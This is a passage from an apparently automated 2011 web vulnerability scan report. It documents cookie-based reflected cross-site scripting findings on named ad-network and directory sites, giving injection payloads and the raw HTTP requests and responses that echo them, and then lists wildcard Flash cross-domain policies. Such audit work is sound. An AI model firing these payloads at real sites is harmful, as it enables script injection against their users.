Set-Cookie: csi15=3142788.js^2^1315313162^1315313162&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1954

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142788"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9c6b4"-alert(1)-"6a907558510\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e29a"-alert(1)-"49c08fab665 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=8e29a"-alert(1)-"49c08fab665; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=35; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^43; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69234; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1691

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8e29a"-alert(1)-"49c08fab665\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54184"-alert(1)-"624e25b3d18 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=54184"-alert(1)-"624e25b3d18; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=18; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^1ca0eaaac19d1eb65fb2a3086; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69232; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1687

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=54184"-alert(1)-"624e25b3d18\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd63"><script>alert(1)</script>9174be4056b was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.html?scid=2323693&cid=e78be HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=e78be%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3E08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Cookie: RlocalUID=tc%3D110906050952308467fd63"><script>alert(1)</script>9174be4056b; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:10:39 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb101
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22698
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=110906050952308467fd63"><script>alert(1)</script>9174be4056b&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top">
...[SNIP]...

2.132. http://www.frontierpages.com/ [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6394a"><script>alert(1)</script>5a4e9c709b5 was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas6394a"><script>alert(1)</script>5a4e9c709b5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:09 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallas6394a"><script>alert(1)</script>5a4e9c709b5&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.133. http://www.frontierpages.com/ [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 1c7d1--><script>alert(1)</script>28ca95d684b was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas1c7d1--><script>alert(1)</script>28ca95d684b

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19016
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:14 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas1c7d1--><script>alert(1)</script>28ca95d684b&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf27"><script>alert(1)</script>cc197d9f09f was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallascbf27"><script>alert(1)</script>cc197d9f09f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:37 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallascbf27"><script>alert(1)</script>cc197d9f09f&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 8b18d--><script>alert(1)</script>394a50af88d was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas8b18d--><script>alert(1)</script>394a50af88d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 18173
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:39 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas8b18d--><script>alert(1)</script>394a50af88d&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

3. Flash cross-domain policy
There are 94 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://40.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 40.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "2b8012-c6-a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.2. http://ad.agkn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.3. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 06 Sep 2011 12:44:53 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.4. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 12:52:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.5. http://ads.media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.media.net

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Oct 2010 16:15:37 GMT
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14ff"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://ads.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 00:39:28 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 00:39:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 43538
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.8. http://ads.yldmgrimg.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yldmgrimg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yldmgrimg.net

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 19 Oct 2009 20:41:08 GMT
ETag: "YM:1:f3afab59-44f8-4ca0-8b65-b58ac0bf0f75-gzip"
Content-Type: text/xml
Server: YTS/1.17.24
x-ysws-request-id: 36c54333-d328-4465-a4d1-5fdacf21cbd6
Cache-Control: max-age=315294929
Expires: Thu, 02 Sep 2021 18:40:27 GMT
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Length: 403
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.9. http://adserver.teracent.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310680427000"
Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:48:07 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
